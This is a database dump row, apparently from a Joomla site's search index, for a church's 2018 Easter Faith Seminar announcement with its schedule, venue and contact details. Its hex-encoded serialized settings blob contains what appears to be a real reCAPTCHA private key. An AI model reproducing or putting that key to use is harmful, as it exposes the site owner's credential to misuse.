(295, 'index.php?option=com_k2&view=item&id=59', 'index.php?option=com_k2&view=item&id=59:2018-annual-easter-faith-seminar', '2018 ANNUAL EASTER FAITH SEMINAR', ' Beloved of God, Greetings of love in Jesus name.We cordially invite you, your friends and family to the 2018 ANNUAL EASTER FAITH SEMINAR coming up 29TH MARCH - 1ST APRIL, 2018. There will be six powerful sessions for this edition of Easter Faith Seminar: Thursday | 29.03.2018 First Session: 5pm - 9pm Friday | 30.03.2018 Second Session: 8am - 2pm Third Session: 5pm - 9pm Saturday | 31.03.2018 Fourth Session: 8am - 12noon Fifth Session Session: 5pm - 9pm Sunday | 01.04.2018 Sixth Session: 8am - 12noon Venue: The Dream Centre Headquaters Km 4 gbongan/osogbo expressway, Dream centre bus stop - Osogbo, Osun State. Joining us to minister are Rev Akinlolu Raphael (World Harvest Network Int\'l. Ibadan, Oyo State) | Pastor Tunde Jayebo (Charis Family Int\'l Church. Ibadan, Oyo State) There will be a SPECIAL MARRIAGE SEMINAR FOR ALL SINGLES on Saturday, 31st of March 2018 between 8am-12noon For Enquiries call +23407060930809 +234 803 849 2153 +234 803 725 2124 You can also join all sessions online via the following media: YouTube: www.lifeoasisinternationalchurch.org/streaming Radio: www.dciradio.org Facebook & Twitter: @ReverendAreogun Come, All things are ready! JESUS is LORD!! ', '2018-03-26 13:10:10', '463bdf96e9839191c8dbbe2a8266e8fd', 1, 1, 1, '*', '2018-03-26 13:05:55', '0000-00-00 00:00:00', '2018-03-26 13:05:55', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223539223b733a353a22616c696173223b733a33323a22323031382d616e6e75616c2d6561737465722d66616974682d73656d696e6172223b733a373a2273756d6d617279223b733a313638353a223c703e42656c6f766564206f6620476f642cc2a03c2f703e0d0a3c703e4772656574696e6773206f66206c6f766520696e204a65737573206e616d652e576520636f726469616c6c7920696e7669746520796f752c20796f757220667269656e647320616e642066616d696c7920746f20746865203230313820414e4e55414c204541535445522046414954482053454d494e415220636f6d696e672075702032395448204d41524348202d2031535420415052494c2c20323031382e3c2f703e0d0a3c703e54686572652077696c6c2062652073697820706f77657266756c2073657373696f6e7320666f7220746869732065646974696f6e206f66204561737465722046616974682053656d696e61723a3c2f703e0d0a3c703e3c7374726f6e673e54687572736461793c2f7374726f6e673e207c2032392e30332e323031383c2f703e0d0a3c703e46697273742053657373696f6e3a2035706d202d2039706d3c2f703e0d0a3c703e3c7374726f6e673e4672696461793c2f7374726f6e673e207c2033302e30332e323031383c2f703e0d0a3c703e5365636f6e642053657373696f6e3a2038616d202d2032706d3c2f703e0d0a3c703e54686972642053657373696f6e3a2035706d202d2039706d3c2f703e0d0a3c703e3c7374726f6e673e53617475726461793c2f7374726f6e673e207c2033312e30332e323031383c2f703e0d0a3c703e466f757274682053657373696f6e3a2038616d202d2031326e6f6f6e3c2f703e0d0a3c703e46696674682053657373696f6e2053657373696f6e3a2035706d202d2039706d3c2f703e0d0a3c703e3c7374726f6e673e53756e6461793c2f7374726f6e673e207c2030312e30342e323031383c2f703e0d0a3c703e53697874682053657373696f6e3a2038616d202d2031326e6f6f6e3c2f703e0d0a3c703e3c7374726f6e673e56656e75653a3c2f7374726f6e673ec2a03c2f703e0d0a3c703e54686520447265616d2043656e747265204865616471756174657273204b6d20342067626f6e67616e2f6f736f67626f20657870726573737761792c20447265616d2063656e747265206275732073746f70202d204f736f67626f2c204f73756e2053746174652e3c2f703e0d0a3c703e3c7374726f6e673e4a6f696e696e6720757320746f206d696e6973746572206172653c2f7374726f6e673e3c2f703e0d0a3c703e52657620416b696e6c6f6c75205261706861656c2028576f726c642048617276657374204e6574776f726b20496e74276c2e2049626164616e2c204f796f20537461746529207c20506173746f722054756e6465204a617965626f20284368617269732046616d696c7920496e74276c204368757263682e2049626164616e2c204f796f205374617465293c2f703e0d0a3c703e54686572652077696c6c2062652061205350454349414c204d415252494147452053454d494e415220464f5220414c4c2053494e474c4553206f6e2053617475726461792c2033317374206f66204d617263682032303138206265747765656e2038616d2d31326e6f6f6e3c2f703e0d0a3c703e3c7374726f6e673e466f7220456e717569726965732063616c6c3c2f7374726f6e673e3c2f703e0d0a3c703e2b32333430373036303933303830393c2f703e0d0a3c703e2b323334203830332038343920323135333c2f703e0d0a3c703e2b323334203830332037323520323132343c2f703e0d0a3c703ec2a03c2f703e0d0a3c703e3c7374726f6e673e596f752063616e20616c736f206a6f696e20616c6c2073657373696f6e73206f6e6c696e65207669612074686520666f6c6c6f77696e67206d656469613a3c2f7374726f6e673e3c2f703e0d0a3c703e596f75547562653a203c6120687265663d22687474703a2f2f7777772e6c6966656f61736973696e7465726e6174696f6e616c6368757263682e6f72672f73747265616d696e67223e7777772e6c6966656f61736973696e7465726e6174696f6e616c6368757263682e6f72672f73747265616d696e673c2f613ec2a03c2f703e0d0a3c703e526164696f3a203c6120687265663d22687474703a2f2f7777772e646369726164696f2e6f7267223e7777772e646369726164696f2e6f72673c2f613ec2a03c2f703e0d0a3c703e46616365626f6f6b2026616d703b20547769747465723a20405265766572656e644172656f67756e3c2f703e0d0a3c703ec2a03c2f703e0d0a3c703e436f6d652c20416c6c207468696e677320617265207265616479213c2f703e0d0a3c703e4a45535553206973204c4f524421213c2f703e223b733a343a22626f6479223b733a303a22223b733a353a226361746964223b733a313a2232223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31313a226d6f6469666965645f6279223b733a313a2230223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223230223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a353a224661697468223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33353a2235393a323031382d616e6e75616c2d6561737465722d66616974682d73656d696e6172223b733a373a22636174736c7567223b733a373a22323a6661697468223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35333a22636f6d706f6e656e742f6b322f6974656d2f35392d323031382d616e6e75616c2d6561737465722d66616974682d73656d696e6172223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a353a224661697468223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224661697468223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3539223b733a353a22726f757465223b733a37323a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d35393a323031382d616e6e75616c2d6561737465722d66616974682d73656d696e6172223b733a353a227469746c65223b733a33323a223230313820414e4e55414c204541535445522046414954482053454d494e4152223b733a31313a226465736372697074696f6e223b733a313138383a222042656c6f766564206f6620476f642c204772656574696e6773206f66206c6f766520696e204a65737573206e616d652e576520636f726469616c6c7920696e7669746520796f752c20796f757220667269656e647320616e642066616d696c7920746f20746865203230313820414e4e55414c204541535445522046414954482053454d494e415220636f6d696e672075702032395448204d41524348202d2031535420415052494c2c20323031382e2054686572652077696c6c2062652073697820706f77657266756c2073657373696f6e7320666f7220746869732065646974696f6e206f66204561737465722046616974682053656d696e61723a205468757273646179207c2032392e30332e323031382046697273742053657373696f6e3a2035706d202d2039706d20467269646179207c2033302e30332e32303138205365636f6e642053657373696f6e3a2038616d202d2032706d2054686972642053657373696f6e3a2035706d202d2039706d205361747572646179207c2033312e30332e3230313820466f757274682053657373696f6e3a2038616d202d2031326e6f6f6e2046696674682053657373696f6e2053657373696f6e3a2035706d202d2039706d2053756e646179207c2030312e30342e323031382053697874682053657373696f6e3a2038616d202d2031326e6f6f6e2056656e75653a2054686520447265616d2043656e747265204865616471756174657273204b6d20342067626f6e67616e2f6f736f67626f20657870726573737761792c20447265616d2063656e747265206275732073746f70202d204f736f67626f2c204f73756e2053746174652e204a6f696e696e6720757320746f206d696e6973746572206172652052657620416b696e6c6f6c75205261706861656c2028576f726c642048617276657374204e6574776f726b20496e74276c2e2049626164616e2c204f796f20537461746529207c20506173746f722054756e6465204a617965626f20284368617269732046616d696c7920496e74276c204368757263682e2049626164616e2c204f796f205374617465292054686572652077696c6c2062652061205350454349414c204d415252494147452053454d494e415220464f5220414c4c2053494e474c4553206f6e2053617475726461792c2033317374206f66204d617263682032303138206265747765656e2038616d2d31326e6f6f6e20466f7220456e717569726965732063616c6c202b3233343037303630393330383039202b32333420383033203834392032313533202b3233342038303320373235203231323420596f752063616e20616c736f206a6f696e20616c6c2073657373696f6e73206f6e6c696e65207669612074686520666f6c6c6f77696e67206d656469613a20596f75547562653a207777772e6c6966656f61736973696e7465726e6174696f6e616c6368757263682e6f72672f73747265616d696e6720526164696f3a207777772e646369726164696f2e6f72672046616365626f6f6b202620547769747465723a20405265766572656e644172656f67756e20436f6d652c20416c6c207468696e67732061726520726561647921204a45535553206973204c4f5244212120223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031382d30332d32362031333a30353a3535223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031382d30332d32362031333a30353a3535223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
